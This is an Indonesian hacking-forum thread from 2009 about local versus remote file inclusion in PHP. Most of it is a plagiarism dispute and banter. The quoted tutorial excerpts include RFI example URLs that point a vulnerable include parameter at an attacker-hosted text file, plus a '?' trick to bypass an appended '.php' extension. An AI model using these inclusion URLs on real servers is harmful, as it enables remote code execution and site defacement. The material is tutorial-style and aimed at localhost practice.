Page 1 of 2

Teori dasar LFI vs RFI

Posted: Sun Oct 11, 2009 1:29 pm
by abah
berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya

Re: Teori dasar LFI vs RFI

Posted: Mon Oct 12, 2009 9:33 am
by shad.hckr
tambah koleksi kata mutiara by abah..

@atas..
perasaan dari kemaren ngebet banget ma Tembak IP.. mau buat nembak siapa pak?? cewek ya?? heuheuheuheu..

Re: Teori dasar LFI vs RFI

Posted: Mon Oct 12, 2009 7:56 pm
by xymcrush17
thank2 om. sharing nya.
@om shad pakabar?? lama gag ketemu neh..heheh

Re: Teori dasar LFI vs RFI

Posted: Tue Oct 13, 2009 7:01 pm
by shad.hckr
@xmycrush..
wkwkwk.. pak kok menghilang dari peredaran?? kena garukan Satpol PP ya?? wkakakaka..

Re: Teori dasar LFI vs RFI

Posted: Sat Oct 24, 2009 2:25 am
by b0c4h
abah.....cucu ijin dunlut file'a ya..... :D

buat simulasi di localhost bisa kan ya bah.....???

Re: Teori dasar LFI vs RFI

Posted: Sat Oct 24, 2009 8:14 pm
by abah
b0c4h wrote:abah.....cucu ijin dunlut file'a ya..... :D

buat simulasi di localhost bisa kan ya bah.....???
bs dan di saranakn buat trik dulu di localhost baru di target pentes :D :D :D

Re: Teori dasar LFI vs RFI

Posted: Wed Oct 28, 2009 2:32 pm
by arira
bro abah, ini artikelnya bikinan abah sendiri bukan ya?? kok sembarangan main edit :mrgreen: :mrgreen:
abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
ini adalah cuplikan dari tutorial yang abah "buat"
eksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah

maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.

.......

misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.

exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.
bandingkan dengan ini
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.
tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15

tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139

maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro :lol: :lol: :lol:

Re: Teori dasar LFI vs RFI

Posted: Wed Oct 28, 2009 5:39 pm
by abah
arira wrote:bro abah, ini artikelnya bikinan abah sendiri bukan ya?? kok sembarangan main edit :mrgreen: :mrgreen:
abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
ini adalah cuplikan dari tutorial yang abah "buat"
eksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah

maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.

.......

misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.

exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.
bandingkan dengan ini
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.
tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15

tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139

maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro :lol: :lol: :lol:
maksdunya anda apa

apa emang penulis yang anda kenal emang bisa melakukan itu aja...sorry bro
OON gini bisa juga om kalau masalah gituan nggak usah di samakan dengan penulis aslina
mungkin om dan penulisna hebat dan mungkin pembuat tulisan itu tapi hargai ane yang bodoh yang pengen juga seperti anda yang hebat dan penulis yang anda kenal

btw thansk kritikanna master